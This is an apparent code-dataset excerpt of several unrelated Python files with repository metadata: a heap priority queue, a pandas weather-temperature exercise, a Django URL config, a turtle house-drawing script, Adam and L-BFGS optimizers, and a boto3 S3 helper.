        """Return the heap's data values as a plain list (None when empty)."""
        if len(self.listy) > 1:
            return [node.data for node in self.listy[1:]]

    def peek(self):
        """Return the minimum Node without removing it (None when empty)."""
        if len(self.listy) == 1:
            return None
        return self.listy[1]

    def pop(self):
        """Remove and return the minimum value (None when empty)."""
        listy = self.listy
        if len(listy) == 1:
            return None
        minimum = listy[1].data
        # Move the last payload to the root, shrink, then restore the heap.
        listy[1].data = listy[-1].data
        del listy[-1]
        if len(listy) > 1:
            self._sift_down(1)
        return minimum
# Smoke test: push seven values, show the heap layout, pop the root, show again.
heap = Pqueue()
print(heap.push(1))
print(heap.push(5))
print(heap.push(4))
print(heap.push(9))
print(heap.push(8))
print(heap.push(7))
print(heap.push(10))
print(heap.tolist())
print(heap.pop())
print(heap.tolist())
| [
"mnath10@stuy.edu"
] | mnath10@stuy.edu |
80e3d5c7c10df49f602e4e750ced29e5821160f1 | 6a342f0c303cd41f2d2a80a2e8a118c86fc6d003 | /pandasExercise.py | 3b36b36a1149263b9a90dde4a77cabef3bf8109a | [] | no_license | QwertyAswal/pandas | 9b51acdb9a2df8ba0556de9ba0f57307805da5b7 | 93cce015407ec2e4af2e413119cb8c42cdc0875e | refs/heads/master | 2020-06-18T13:42:50.550684 | 2019-07-11T05:09:51 | 2019-07-11T05:09:51 | 196,321,391 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,075 | py | import pandas as pd
def findOut(df):
    """Flag which TEMP readings fall within two standard deviations of the mean.

    Returns a list of booleans aligned with df['TEMP']: True when the value
    lies inside [mean - 2*std, mean + 2*std] (inclusive), False otherwise.
    NaN readings compare False on both bounds and are therefore flagged
    False, matching the original element-wise loop.
    """
    temp = df['TEMP']
    max_val = temp.mean() + 2 * temp.std()
    min_val = temp.mean() - 2 * temp.std()
    # Vectorised inclusive range test instead of a Python-level loop.
    return temp.between(min_val, max_val).tolist()
def toCelcius(df):
    """Convert every Fahrenheit reading in df['TEMP'] to Celsius.

    Returns a plain list aligned with the TEMP column.
    """
    return [(temp_f - 32) * 5 / 9 for temp_f in df['TEMP']]
def toInt(df):
    """Round each value in df['Celsius'] to the nearest integer.

    Returns a plain list aligned with the Celsius column.
    """
    return [round(celsius) for celsius in df['Celsius']]
def getNew(df):
    """Integer-divide each df['YR--MODAHRMN'] timestamp by 100.

    Returns a plain list aligned with the column (drops the last two digits
    of every timestamp).
    """
    return [stamp // 100 for stamp in df['YR--MODAHRMN']]
# question 1
# Load weather observations; runs of '*' are the file's missing-value markers.
df = pd.read_csv('6153237444115dat.csv', na_values=['*', '**', '***', '****', '*****', '******'])
print("Rows:- ", df.__len__())
print("Columns:- ", *df.columns)
print("Column Types:- \n", df.dtypes)
print("Mean Temp:- ", df['TEMP'].mean())
print("Standard Deviation Max Temp:- ", df['MAX'].std())
ls = df['USAF'].unique()
print(ls.__len__())
# find outer
df['Outer'] = findOut(df)
# exercise 2
# Keep only the columns needed for the temperature analysis.
selected = pd.DataFrame({'USAF': list(df['USAF']), 'YR--MODAHRMN': list(df['YR--MODAHRMN']), 'TEMP': list(df['TEMP']),
                         'MAX': list(df['MAX']), 'MIN': list(df['MIN'])})
selected = selected.dropna(axis=0, how='any', subset=['TEMP'])
li = toCelcius(selected)
selected['Celsius'] = li
selected['Celsius'] = toInt(selected)
# Split per weather-station id and write one CSV per station.
selectedUSAF = selected.groupby('USAF')
kumpula = selectedUSAF.get_group(29980)
kumpula.to_csv('Kumpula_temps_May_Aug_2017.csv')
rovaniemi = selectedUSAF.get_group(28450)
rovaniemi.to_csv('Rovaniemi_temps_May_Aug_2017.csv')
# exercise 3
# NOTE(review): the list is never sorted, so li[len // 2] is the middle
# element in file order, not the statistical median — confirm intent.
li = list(kumpula['TEMP'])
print("Median Kumpula:- ", li[li.__len__() // 2])
li = list(rovaniemi['TEMP'])
print("Median Rovaniemi:- ", li[li.__len__() // 2])
# Dividing YR--MODAHRMN by 1e6 leaves a YYYYMM value for month filtering.
kumpula_may = kumpula[kumpula['YR--MODAHRMN'] // 1000000 == 201705]
kumpula_june = kumpula[kumpula['YR--MODAHRMN'] // 1000000 == 201706]
rovaniemi_may = rovaniemi[rovaniemi['YR--MODAHRMN'] // 1000000 == 201705]
rovaniemi_june = rovaniemi[rovaniemi['YR--MODAHRMN'] // 1000000 == 201706]
print("Kumpala:-")
print("May:-")
print("Mean:-", kumpula_may['TEMP'].mean())
print("Min:-", kumpula_may['TEMP'].min())
print("Max:-", kumpula_may['TEMP'].max())
print("June:-")
print("Mean:-", kumpula_june['TEMP'].mean())
print("Min:-", kumpula_june['TEMP'].min())
print("Max:-", kumpula_june['TEMP'].max())
print("Rovaniemi:-")
print("May:-")
print("Mean:-", rovaniemi_may['TEMP'].mean())
print("Min:-", rovaniemi_may['TEMP'].min())
print("Max:-", rovaniemi_may['TEMP'].max())
print("June:-")
print("Mean:-", rovaniemi_june['TEMP'].mean())
print("Min:-", rovaniemi_june['TEMP'].min())
print("Max:-", rovaniemi_june['TEMP'].max())
# exercise 4
# Group by the truncated timestamp and aggregate mean/max/min temperature.
liNew = getNew(df)
df['HRNEW'] = liNew
hour = []
mea = []
ma = []
mi = []
newData = df.groupby('HRNEW')
for i, j in newData:
    hour.append(i)
    mea.append(j["TEMP"].mean())
    ma.append(j["TEMP"].max())
    mi.append(j['TEMP'].min())
lastDF = pd.DataFrame({'Hour': hour, 'Mean': mea, 'Max': ma, 'Min': mi})
print(lastDF)
lastDF.to_csv('LastCSV.csv', index=False)
| [
"noreply@github.com"
] | QwertyAswal.noreply@github.com |
e10af10c17a74257c1bfab627cc04fe39b25b1b7 | 96903069c6f109f5a7b7d88ec8cd3f334db8b370 | /backend/backend/urls.py | 75ad6128f0c57086839af3de97c520c4ea0f8417 | [] | no_license | luisthume/projeto_dashboard | b4e97635daf94be65246a1f77ac807242e91755b | d136dd3d2b1841ffd939faf90cc5cacb0980ff4e | refs/heads/master | 2023-03-04T11:17:41.312157 | 2021-02-06T23:25:25 | 2021-02-06T23:25:25 | 332,869,943 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 802 | py | """backend URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
# Root URL routes: the Django admin plus the api app's test endpoints.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('api/test/', include('api.urls')),
]
| [
"luisltcs@gmail.com"
] | luisltcs@gmail.com |
de0ac26b4417af4cfa68ee5a2c5214e54a9f3c18 | 86109bf63dcf43d180738102973df847ea631f7b | /03/vesnice.py | a810a8c4b122535fdc47153de6c01be17238a8d0 | [] | no_license | HanaKarbanova/pyladie.cz | afa103042ba45c5d3a82fd27ba444985aae23c5c | c6aa56430d689ff69243467949d8a191319589c6 | refs/heads/master | 2020-07-02T18:59:53.571701 | 2016-11-20T17:19:18 | 2016-11-20T17:19:18 | 74,288,583 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 696 | py | #zde se kreslí vesnice
from turtle import forward, left, right, penup, pendown, exitonclick
from math import sqrt
# Ask (prompts are in Czech) for the wall length and the number of houses.
strana=float(input('Jak je dlouhá strana?:'))
velikost = int(input('Kolik chceš baráčků:'))
# Move the pen 300 steps to the left without drawing, then face right again.
penup()
left(180)
forward(300)
pendown()
right(180)
#setpoint(300)
# Draw `velikost` houses in a row: square walls with crossing diagonals and
# a roof, then advance 20 units to the start of the next house.
for i in range(velikost):
    left(90)
    forward(strana)
    right(135)
    forward(sqrt(2)*strana)
    right(135)
    forward(strana)
    right(135)
    forward(sqrt(2)*strana)
    left(135)
    forward(strana)
    right(135)
    forward((sqrt(2)*strana)/2)
    right(90)
    forward((sqrt(2)*strana)/2)
    right(45)
    forward(strana)
    left(90)
    forward(20)
# "Village built" confirmation (Czech), then wait for a click to close.
print("Vesnice postavena;o)")
exitonclick()
| [
"hana@karbanova.cz"
] | hana@karbanova.cz |
450743dde646e0a0b66802c629ddb6cf7f9b9ee1 | def5022618e9f142fc5ea107ab70ab7aa57b0432 | /common/optimizer.py | fa24580e14f0ede35045d2fa53a9066b03f4126f | [] | no_license | iDMatlab/EEG-P300Speller-Toolkit | a0d4bdc41f0ea8ca2bc4985fe4b69ba82dfb1410 | d754fb6568229c9de5f5cfadfa1c5532945654f0 | refs/heads/master | 2023-04-15T23:33:11.172432 | 2019-10-23T07:58:54 | 2019-10-23T07:58:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,894 | py | # -*- coding: utf-8 -*-
import numpy as np
from scipy.optimize import fmin_l_bfgs_b
from abc import ABCMeta, abstractmethod
class GradientDescentOptimizer(metaclass=ABCMeta):
    """Abstract interface for gradient-descent style optimizers.

    Bug fixes: the original set a ``__metaclass__`` class attribute, which
    is Python 2 syntax and has no effect under Python 3, so ``minimize``
    was never actually enforced as abstract; the metaclass now goes in the
    class header.  The parameter typo ``fojb`` is corrected to ``fobj`` to
    match the concrete subclasses.
    """

    @abstractmethod
    def minimize(self, fobj, x0, args):
        """Minimize fobj(theta, *args) starting from x0; return the
        optimized parameter vector."""
        raise NotImplementedError()
class AdamOptimizer(GradientDescentOptimizer):
def __init__(self, maxit=500, stopeps=1e-6):
self.maxit = maxit
self.stopeps = stopeps
def minimize(self, fobj, x0, args):
alpha = 0.01
beta_1 = 0.9
beta_2 = 0.999 # initialize the values of the parameters
epsilon = 1e-8
it = 0
m_t = 0
v_t = 0
theta_0 = x0
d_theta = np.Inf
while (d_theta > self.stopeps) and (it < self.maxit): # till it gets converged
it = it + 1
theta_prev = theta_0
f_t, g_t = fobj(theta_0, *args)
m_t = beta_1 * m_t + (1 - beta_1) * g_t # updates the moving averages of the gradient
v_t = beta_2 * v_t + (1 - beta_2) * (g_t * g_t) # updates the moving averages of the squared gradient
m_cap = m_t / (1 - (beta_1 ** it)) # calculates the bias-corrected estimates
v_cap = v_t / (1 - (beta_2 ** it)) # calculates the bias-corrected estimates
theta_0 = theta_0 - (alpha * m_cap) / (np.sqrt(v_cap) + epsilon) # updates the parameters
d_theta = np.linalg.norm(theta_0-theta_prev)
print('Iteration %d: FuncValue = %f, d_theta = %f' % (it, f_t, d_theta))
return theta_0
class LbfgsOptimizer(GradientDescentOptimizer):
def __init__(self, maxit=500, stopeps=1e-5):
self.maxit = maxit
self.stopeps = stopeps
def minimize(self, fobj, x0, args):
theta, obj, info = fmin_l_bfgs_b(fobj, x0, args=args, maxiter=self.maxit, epsilon=self.stopeps, disp=1)
return theta | [
"44161787+stephen-hjay@users.noreply.github.com"
] | 44161787+stephen-hjay@users.noreply.github.com |
cce157999454496287f57ee49815b75ccd807999 | f077ad4cf886976e82d3bd1befa99711263f8c4f | /homework/HW3/HW3-final/P2B.py | ce4a84e1e494d2a095913fbfcbb779b3a3d2c43c | [] | no_license | vditomasso/cs107_victoria_ditomasso | ff9263a7034bbf6586e2c046679f3b6e9419d92b | 2df8d4562159f0bfa7f2c78984df2a84ab82e165 | refs/heads/master | 2023-01-29T03:50:49.929143 | 2020-12-10T19:26:46 | 2020-12-10T19:26:46 | 291,739,733 | 0 | 0 | null | 2020-12-10T19:26:47 | 2020-08-31T14:35:50 | Jupyter Notebook | UTF-8 | Python | false | false | 76 | py | #!/usr/bin/env python3
# Print the interactive help text for the project-local Regression class.
from Regression import Regression as reg
help(reg)
| [
"victoriaditomasso@Victorias-MacBook-Pro.local"
] | victoriaditomasso@Victorias-MacBook-Pro.local |
b71af90781dd820c929003a9e1a46da4ff098c1a | c6600947c3654cdf10ee00543da086c2eeb81c92 | /GourdianTest/s3.py | 894e1ca121f27568de6abc8ca8f1ee8d2c2c1f95 | [] | no_license | javadevelopr/GourdianOracle | 42a298a378111e412543a0c184a2394203f52650 | 246b8e241a896086ab7b6d1b6cb8bb6bef2aa44c | refs/heads/master | 2022-12-15T20:30:33.838779 | 2020-09-07T17:15:22 | 2020-09-07T17:15:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,972 | py | #!/usr/bin/env python
# File Name: chunk.py
#
# Date Created: Feb 16,2020
#
# Last Modified: Tue Feb 25 18:12:03 2020
#
# Author: samolof
#
# Description:
#
##################################################################
import boto3
import botocore
from os.path import basename
import datetime
import hashlib
import os
import tempfile
import logging
from tagger import tag
from typing import Union, List, Dict, Optional, Callable
_sanitizeFN = lambda f: f.endswith('/') and f.rstrip('/') or f
def moveCanon(s3BucketName: str, s3canonPrefix: str, s3destPrefix: str):
    """Move a canonical dataset version into a timestamped destination folder.

    The first object under ``s3canonPrefix`` is expected to be named
    ``<name>.<timestamp>``; that timestamp becomes the destination
    sub-folder name under ``s3destPrefix``.

    Bug fix: the original instantiated ``S3Operator(s3bucketName)`` with a
    misspelled (undefined) name, raising NameError on every call.
    """
    s3 = S3Operator(s3BucketName)
    # use filename extension (tag.timestamp) to get the timestamp of this
    # version and use it as the new folder name
    fileName = s3.getObjNames(s3canonPrefix)[0]
    versionTimeStamp = fileName.split('.')[1]
    s3.moveAllFilesInFolder(s3canonPrefix, s3destPrefix + '/' + versionTimeStamp)
class S3Operator(object):
    """Thin convenience wrapper around boto3 resource/client operations for
    a single S3 bucket."""

    def __init__(self, bucketName: str, aws_access_id: str=None, aws_secret_access_key: str=None):
        # NOTE(review): the credential parameters are accepted but never
        # forwarded to boto3, which falls back to the default credential
        # chain — confirm whether explicit credentials should be honoured.
        self.s3 = boto3.resource('s3')
        self.s3c = boto3.client('s3')
        self.bucket = self.s3.Bucket(bucketName)
        self.bucketName = self.bucket.name

    def getObjNames(self, prefix: str, ignoreFolders: bool = False):
        """List object keys under ``prefix``.

        Skips Spark's ``_SUCCESS`` marker and the prefix folder key itself;
        with ``ignoreFolders`` also drops keys ending in ``/``.
        """
        fileNames = []
        for obj in self.bucket.objects.filter(Prefix=prefix):
            key = obj.key
            if os.path.basename(key) == '_SUCCESS':  # ignore Spark special file
                continue
            if key == prefix + "/":  # ignore the base folder itself
                continue
            fileNames.append(key)
        if ignoreFolders:
            fileNames = [f for f in fileNames if not f.endswith('/')]
        return fileNames

    def upload(self, filename: str, s3path: str, bucketName: Optional[str]=None):
        """Upload a local file to ``s3path`` (defaults to this bucket).

        Bug fix: the original called ``selfs3c.upload_file`` (missing dot),
        which raised NameError on every call.
        """
        bucketName = bucketName or self.bucket.name
        self.s3c.upload_file(filename, bucketName, s3path)

    def download(self, s3objName: str):
        """Download an object into the system temp dir and return the local path.

        Bug fix: the boto3 client method is ``download_file``; the original
        called the nonexistent ``download``.
        """
        currentdir = os.getcwd()
        try:
            tempdir = tempfile.gettempdir()
            os.chdir(tempdir)
            self.s3c.download_file(self.bucket.name, s3objName, os.path.basename(s3objName))
        finally:
            # Always restore the working directory, even on failure.
            os.chdir(currentdir)
        return tempdir + "/" + os.path.basename(s3objName)

    def copyFile(self, s3srcPath: str, s3destPath: str):
        """Server-side copy of one object within the bucket."""
        srcPath = f"{self.bucket.name}/{s3srcPath}"
        self.s3.Object(self.bucket.name, s3destPath).copy_from(CopySource=srcPath)

    def moveFile(self, s3srcPath: str, s3destPath: str):
        """Copy the object to its destination, then delete the source."""
        self.copyFile(s3srcPath, s3destPath)
        self.s3.Object(self.bucket.name, s3srcPath).delete()

    def createFolder(self, folderName: str, s3Prefix: str = None):
        """Create an empty 'folder' marker object (a key ending in ``/``).

        Bug fix: the body referenced an undefined name ``prefix`` instead of
        the ``s3Prefix`` parameter, raising NameError on every call; the
        failure branch also used a bare ``raise`` with no active exception.
        """
        if s3Prefix == "":
            s3Prefix = None
        key = f"{s3Prefix}/{folderName}/" if s3Prefix else f"{folderName}/"
        resp = self.s3c.put_object(Bucket=self.bucketName, Key=key)
        if resp['ResponseMetadata']['HTTPStatusCode'] not in range(200, 210):
            raise RuntimeError(f"put_object failed for key {key}")

    def moveAllFilesInFolder(self, s3srcFolder: str, s3destFolder: str):
        """Move every file directly under ``s3srcFolder`` to ``s3destFolder``,
        creating the destination folder first if it does not exist.

        Bug fix: the 404 branch referenced the misspelled ``s3desFolder``
        (NameError) via two dead local variables; they are removed.
        """
        s3srcFolder = _sanitizeFN(s3srcFolder)
        s3destFolder = _sanitizeFN(s3destFolder)
        try:
            self.s3.Object(self.bucketName, s3destFolder + "/").load()
        except botocore.exceptions.ClientError as e:
            if e.response["Error"]["Code"] == "404":
                # Destination folder marker is missing: create it.
                self.createFolder(os.path.basename(s3destFolder), os.path.dirname(s3destFolder))
            else:
                raise
        fileNames = self.getObjNames(s3srcFolder, ignoreFolders=True)
        for f in fileNames:
            f = os.path.basename(f)
            self.moveFile(s3srcFolder + f"/{f}", s3destFolder + f"/{f}")
| [
"java.developer.cl@gmail.com"
] | java.developer.cl@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.